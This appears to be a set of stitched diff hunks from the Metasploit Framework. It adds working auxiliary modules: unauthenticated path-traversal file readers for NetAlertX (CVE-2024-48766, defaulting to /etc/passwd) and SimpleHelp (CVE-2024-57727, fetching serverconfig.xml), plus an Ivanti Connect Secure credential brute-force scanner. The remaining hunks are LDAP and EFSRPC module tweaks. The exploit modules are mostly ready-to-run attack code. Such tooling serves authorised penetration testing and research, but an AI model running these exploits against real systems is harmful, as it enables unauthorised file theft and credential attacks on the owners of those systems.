-      fail_with(Failure::UnexpectedReply, "Couldn't discover base DN!") unless ldap.base_dn
-      base_dn = ldap.base_dn
-      print_status("#{ldap.peerinfo} Discovered base DN: #{base_dn}")
+      if datastore['BASE_DN'].blank?
+        fail_with(Failure::UnexpectedReply, "Couldn't discover base DN!") unless ldap.base_dn
+        base_dn = ldap.base_dn
+        print_status("#{ldap.peerinfo} Discovered base DN: #{base_dn}")
+      else
+        base_dn = datastore['BASE_DN']
+      end

      schema_dn = ldap.schema_dn
      case action.name
@@ -149,22 +153,21 @@ class MetasploitModule < Msf::Auxiliary
        run_queries_from_file(ldap, parsed_queries, schema_dn, datastore['OUTPUT_FORMAT'])
        return
      when 'RUN_SINGLE_QUERY'
-        unless datastore['QUERY_FILTER'] && datastore['QUERY_ATTRIBUTES']
-          fail_with(Failure::BadConfig, 'When using the RUN_SINGLE_QUERY action, one must supply the QUERY_FILTER and QUERY_ATTRIBUTE datastore options!')
+        unless datastore['QUERY_FILTER']
+          fail_with(Failure::BadConfig, 'When using the RUN_SINGLE_QUERY action, one must supply the QUERY_FILTER datastore option!')
        end

        print_status("Sending single query #{datastore['QUERY_FILTER']} to the LDAP server...")
-        attributes = datastore['QUERY_ATTRIBUTES']
-        if attributes.empty?
-          fail_with(Failure::BadConfig, 'Attributes list is empty as we could not find at least one attribute to filter on!')
+        if datastore['QUERY_ATTRIBUTES'].present?
+          # Split attributes string into an array of attributes, splitting on the comma character.
+          # Also downcase for consistency with rest of the code since LDAP searches aren't case sensitive.
+          attributes = datastore['QUERY_ATTRIBUTES'].downcase.split(',')
+
+          # Strip out leading and trailing whitespace from the attributes before using them.
+          attributes.map(&:strip!)
+        else
+          attributes = nil
        end
-
-        # Split attributes string into an array of attributes, splitting on the comma character.
-        # Also downcase for consistency with rest of the code since LDAP searches aren't case sensitive.
-        attributes = attributes.downcase.split(',')
-
-        # Strip out leading and trailing whitespace from the attributes before using them.
-        attributes.map(&:strip!)
        filter_string = datastore['QUERY_FILTER']
        query_base = base_dn
      else
@@ -10,6 +10,13 @@ require 'ruby_smb/dcerpc/lsarpc'
 require 'ruby_smb/dcerpc/efsrpc'

 class MetasploitModule < Msf::Auxiliary
+
+  module EfsrpcOverLsarpc
+    include RubySMB::Dcerpc::Efsrpc
+
+    UUID = RubySMB::Dcerpc::Efsrpc::LSARPC_UUID
+  end
+
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client::Authenticated
  include Msf::Auxiliary::Scanner
@@ -20,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
  # Efsrpc and it's normal UUID
  PIPE_HANDLES = {
    lsarpc: {
-      endpoint: RubySMB::Dcerpc::Lsarpc,
+      endpoint: EfsrpcOverLsarpc,
      filename: 'lsarpc'.freeze
    },
    efsrpc: {
@@ -0,0 +1,108 @@
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => ' NetAlertX File Read Vulnerability',
+        'Description' => %q{
+          This module exploits improper authentication in logs.php endpoint. An unathenticated attacker can request log file and read any file due path traversal vulnerability.
+        },
+        'References' => [
+          ['CVE', '2024-48766'],
+          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-46506-rce-in-netalertx/']
+        ],
+        'Author' => [
+          'chebuya', # Vulnerability discovery
+          'msutovsky-r7' # Metasploit module
+        ],
+        'DisclosureDate' => '2025-01-30',
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(20211),
+        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+        OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 5])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'maintenance.php')
+    })
+    return Exploit::CheckCode::Unknown unless res&.code == 200
+
+    html_document = res.get_html_document
+    return Exploit::CheckCode::Unknown('Failed to get html document.') if html_document.blank?
+
+    version_element = html_document.xpath('//div[text()="Installed version"]//following-sibling::*')
+    return Exploit::CheckCode::Unknown('Failed to get version element.') if version_element.blank?
+
+    version = Rex::Version.new(version_element.text&.strip&.sub(/^v/, ''))
+    return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.") unless version.between?(Rex::Version.new('24.7.18'), Rex::Version.new('24.9.12'))
+
+    Exploit::CheckCode::Appears("Version #{version} detected.")
+  end
+
+  def run_host(ip)
+    traversal = '../' * datastore['DEPTH']
+    filepath = datastore['FILEPATH']
+    dummyfilename = Rex::Text.rand_text_alphanumeric(6)
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri('/php/components/logs.php'),
+      'vars_post' =>
+      {
+        'items' => %([{"buttons":[{"labelStringCode":"Maint_PurgeLog","event":"logManage(app.log, cleanLog)"},{"labelStringCode":"Maint_RestartServer","event":"askRestartBackend()"}],"fileName":"#{dummyfilename}","filePath":"#{traversal}#{filepath}","textAreaCssClass":"logs"}])
+
+      }
+    })
+
+    fail_with Failure::Unreachable, 'Connection failed' unless res
+    fail_with Failure::NotVulnerable, 'Unexpected response code' unless res&.code == 200
+    fail_with Failure::NotVulnerable, 'Unexpected response' if res&.body.blank?
+
+    html = res.get_html_document
+
+    fail_with Failure::NotVulnerable, 'No HTML body' if html.blank?
+
+    log_data = html.at('textarea')
+
+    fail_with Failure::PayloadFailed, 'No data' if log_data&.blank? || log_data&.text&.empty?
+    print_status 'Received data:'
+    print_status log_data.text
+
+    loot_path = store_loot(
+      'netalert.results',
+      'text/plain',
+      ip,
+      log_data.text,
+      "netalert-#{filepath}.txt",
+      'NetAlertX'
+    )
+    print_status "Stored results in #{loot_path}"
+    report_vuln({
+      host: rhost,
+      port: rport,
+      name: name,
+      refs: references,
+      info: "Module #{fullname} successfully leaked file"
+    })
+  end
+end
@@ -0,0 +1,109 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SimpleHelp Path Traversal Vulnerability CVE-2024-57727',
+        'Description' => %q{
+          There exists a path traversal vulnerability in the /toolbox-resource endpoint that enables unauthenticated
+          remote attackers to download arbitrary files from the SimpleHelp server via crafted HTTP requests
+        },
+        'Author' => [
+          'horizon3ai', # discovery
+          'imjdl',      # CVE-2024-57727 PoC
+          'jheysel-r7'  # module
+        ],
+        'References' => [
+          [ 'URL', 'https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/'], # Discovery
+          [ 'URL', 'https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier'], # Vendor Advisory
+          [ 'URL', 'https://rustlang.rs/posts/simple-help/'], # PoC for Path Traversal CVE-2024-57727
+          [ 'URL', 'https://attackerkb.com/topics/G4CTOrbDx0/cve-2024-57727'], # PoC for Path Traversal CVE-2024-57727
+          [ 'CVE', '2024-57727'],
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2025-01-12',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ IOC_IN_LOGS, ],
+          'Reliability' => [ ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to SimpleHelp installation', '/']),
+        OptString.new('FILEPATH', [true, 'The path to the file to read', 'configuration/serverconfig.xml']),
+        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 2 ])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'allversions')
+    )
+
+    return Exploit::CheckCode::Unknown('Unable to retrieve SimpleHelp version.') unless res&.body =~ /Visual Version:\s*(\d+\.\d+(?:\.\d+))/
+
+    version = Rex::Version.new(Regexp.last_match(1))
+
+    # Patched versions are: 5.5.8 or 5.4.10 or 5.3.9
+    if version.between?(Rex::Version.new('5.5.0'), Rex::Version.new('5.5.7')) ||
+       version.between?(Rex::Version.new('5.4.0'), Rex::Version.new('5.4.9')) ||
+       version.between?(Rex::Version.new('5.3.0'), Rex::Version.new('5.3.8'))
+      return Exploit::CheckCode::Appears("Version detected: #{version}")
+    end
+
+    Exploit::CheckCode::Safe("Version detected: #{version}")
+  end
+
+  def run_host(ip)
+    directory = %w[alertsdb invitations secmsg toolbox-resources backups sslconfig translations notifications techprefs history recordings templates html remotework toolbox].sample
+    traverse = '../' * datastore['DEPTH']
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "/toolbox-resource/../#{directory}/#{traverse}/#{datastore['FILEPATH']}")
+    )
+
+    unless res&.code == 200 && res.body.present?
+      print_error('Nothing was downloaded')
+      return
+    end
+
+    vprint_line(res.body)
+    print_good("Downloaded #{res.body.length} bytes")
+
+    report_vuln(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: name,
+      info: 'Module triggered a 200 reply',
+      refs: references
+    )
+
+    path = store_loot(
+      'simplehelp.traversal',
+      'text/plain',
+      ip,
+      res.body,
+      datastore['FILEPATH']
+    )
+    print_good("File saved in: #{path}")
+  end
+end
@@ -0,0 +1,88 @@
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/ivanti_login'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::ReportSummary
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ivanti Connect Secure HTTP Scanner',
+        'Description' => %q{
+          This module will perform authentication scanning against Ivanti Connect Secure
+        },
+        'Author' => ['msutovsky-r7'],
+        'License' => MSF_LICENSE,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS, ACCOUNT_LOCKOUTS]
+        }
+      )
+         )
+    register_options([
+      OptBool.new('ADMIN', [true, 'Select whether to test admin account', false])
+    ])
+  end
+
+  def get_scanner(ip)
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+      blank_passwords: datastore['BLANK_PASSWORDS'],
+      pass_file: datastore['PASS_FILE'],
+      password: datastore['PASSWORD'],
+      user_file: datastore['USER_FILE'],
+      userpass_file: datastore['USERPASS_FILE'],
+      username: datastore['USERNAME'],
+      user_as_pass: datastore['USER_AS_PASS']
+    )
+    configuration = configure_http_login_scanner(
+      host: ip,
+      port: datastore['RPORT'],
+      cred_details: cred_collection,
+      stop_on_success: datastore['STOP_ON_SUCCESS'],
+      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
+      connection_timeout: datastore['HttpClientTimeout'] || 5
+    )
+    return Metasploit::Framework::LoginScanner::Ivanti.new(configuration, datastore['ADMIN'])
+  end
+
+  def process_credential(credential_data)
+    credential_combo = "#{credential_data[:username]}:#{credential_data[:private_data]}"
+    case credential_data[:status]
+    when Metasploit::Model::Login::Status::SUCCESSFUL
+      print_good "#{credential_data[:address]}:#{credential_data[:port]} - Login Successful: #{credential_combo}"
+      credential_data[:core] = create_credential(credential_data)
+      create_credential_login(credential_data)
+      return { status: :success, credential: credential_data }
+    else
+      error_msg = "#{credential_data[:address]}:#{credential_data[:port]} - LOGIN FAILED: #{credential_combo} (#{credential_data[:status]})"
+      vprint_error error_msg
+      invalidate_login(credential_data)
+      return { status: :fail, credential: credential_data }
+    end
+  end
+
+  def run_scanner(scanner)
+    scanner.scan! do |result|
+      credential_data = result.to_h
+      credential_data.merge!(module_fullname: fullname, workspace_id: myworkspace_id)
+      process_credential(credential_data)
+    end
+  end
+
+  def run_host(ip)
+    scanner = get_scanner(ip)
+    run_scanner(scanner)
+  end
+
+end
@@ -89,12 +89,19 @@ class MetasploitModule < Msf::Auxiliary
  end

  def run_host(ip)
+    ignore_public = datastore['LDAP::Auth'] == Msf::Exploit::Remote::AuthOption::SCHANNEL
+    ignore_private =
+      datastore['LDAP::Auth'] == Msf::Exploit::Remote::AuthOption::SCHANNEL ||
+      (Msf::Exploit::Remote::AuthOption::KERBEROS && !datastore['ANONYMOUS_LOGIN'] && !datastore['PASSWORD'])
+
    cred_collection = build_credential_collection(
      username: datastore['USERNAME'],
      password: datastore['PASSWORD'],
      realm: datastore['DOMAIN'],
      anonymous_login: datastore['ANONYMOUS_LOGIN'],
-      blank_passwords: false
+      blank_passwords: false,
+      ignore_public: ignore_public,
+      ignore_private: ignore_private
    )

    opts = {
@@ -107,14 +114,20 @@ class MetasploitModule < Msf::Auxiliary
      ldap_cert_file: datastore['LDAP::CertFile'],
      ldap_rhostname: datastore['Ldap::Rhostname'],
      ldap_krb_offered_enc_types: datastore['Ldap::KrbOfferedEncryptionTypes'],
-      ldap_krb5_cname: datastore['Ldap::Krb5Ccname'],
-      # Write only cache so we keep all gathered tickets but don't reuse them for auth while running the module
-      kerberos_ticket_storage: kerberos_ticket_storage({ read: false, write: true })
+      ldap_krb5_cname: datastore['Ldap::Krb5Ccname']
    }

    realm_key = nil
    if opts[:ldap_auth] == Msf::Exploit::Remote::AuthOption::KERBEROS
      realm_key = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+      if !datastore['ANONYMOUS_LOGIN'] && !datastore['PASSWORD']
+        # In case no password has been provided, we assume the user wants to use Kerberos tickets stored in cache
+        # Write mode is still enable in case new TGS tickets are retrieved.
+        opts[:kerberos_ticket_storage] = kerberos_ticket_storage({ read: true, write: true })
+      else
+        # Write only cache so we keep all gathered tickets but don't reuse them for auth while running the module
+        opts[:kerberos_ticket_storage] = kerberos_ticket_storage({ read: false, write: true })
+      end
    end

    scanner = Metasploit::Framework::LoginScanner::LDAP.new(
--- a/Show More
+++ b/Show More